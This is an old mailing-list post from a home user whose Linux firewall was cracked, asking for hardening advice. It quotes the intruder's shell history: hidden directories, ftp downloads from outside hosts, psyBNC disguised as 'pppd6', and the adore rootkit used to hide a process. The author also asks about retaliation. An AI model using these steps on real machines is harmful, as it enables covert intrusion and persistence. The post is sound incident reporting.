[CLUE-Tech] Lousy no-good @!$#%@#$% (cracked)

Mon Jan 28 20:08:25 MST 2002

Well, I've been noticing weird things on my firewall box since Friday.  I
wasn't able to SSH in several times, had to turn it on from the console,
only to discover hours later or next day it's not working again. So this
morning I'm eating my bagel and coffee before work and I decide to try SSH
again.  It's not on. So I start getting suspicious (finally) and decide to
snoop about for any foul play - sure enough, I've been cracked. I've been
pretty lazy about setting up ipchains to block things that I should be
blocking. I am guessing that this jackass is trying to make my box part of a
DDoS attack when the word comes via IRC. Here's at least a partial log of
what he did (from .bash_history) from an account called marian he made on
the box (with user id of 0):

whoami
mkdir ".. "
cd ".. "
mkdir ...
cd ...
mkdir ".. "
cd ".. "
ftp www.marianhome.go.ro
tar xzvf psyBNC2.2.tar.gz
cd psybnc
pico psybnc.conf
ake
make
pico psybnc.conf
mv psybnc pppd6
./pppd6
ftpwww.marianhome.go.ro
ftp www.marianhome.go.ro
ftp ftp.gecities.com
tar xzvf adore.tgz
cd adore
./configure
make
./configure
pico adore.h
ls -a
./startadore
ps ax
./configure
ls -a
./ava
ava i 6103
./ava i 6103
./ava i 6103
ps ax

This was from today's session - I don't *think* he's the average script
kiddie, since he did try to cover his tracks by deleting .bash_history
during some of his shenanigans the first time...plus he's not trying to
exploit windows.

I also scribbled down the IP numbers from where some of the logins took
place. Is there anything I can do in retaliation? He kept turning off ssh
(kind of stupid; it would have taken me a lot longer to notice otherwise)
and turned ON telnet. He also enabled rlogin, too. I tried to close things
up (hastily) before work, but I overlooked the rlogin...before I went to
work, I deleted his home dir and entry in passwd. I tried to deny packets to
port 53, but I'm not sure how to test. I guess I didn't do too good of a
job, because by 10:30, he must have logged in and killed sshd
again...because it wasn't responding. I had to wait until I got home, and
sure enough, my little friend had been at it again. 

Prior to attack, I was running some services which I know I shouldn't have
been , at least not without denying packets from outside - bind, smbd, nmbd,
identd. I still have no idea what he did to crack machine, and that really
bothers me. What I'd like to do is get ipchains rules together that block
all incoming packets except for ssh and except for stuff returning from
machines behind firewall. Getting cut off from home machine while at work is
a real PITA w/o the added worry of what this induhvidual intentions are...

So, any advice anyone has would be great. I ran Bastille scripts on this
machine once before, I may do that again, too...I changed a few things since
last I ran it, so it sure couldn't help.

I planned on swapping out this machine, and putting in its place OpenBSD
(and a very bare installation, at that); now I guess that is higher up on
the priority list - but in the meantime, I'd like some stopgap measure to
keep this punk out. I have to at least download the OpenBSD ISO and get some
hardware in order before I can do what I really need to do to stop this
nonsense.

-- 
Sean LeBlanc:seanleblanc at attbi.com Yahoo:seanleblancathome 
ICQ:138565743 MSN:seanleblancathome AIM:sleblancathome 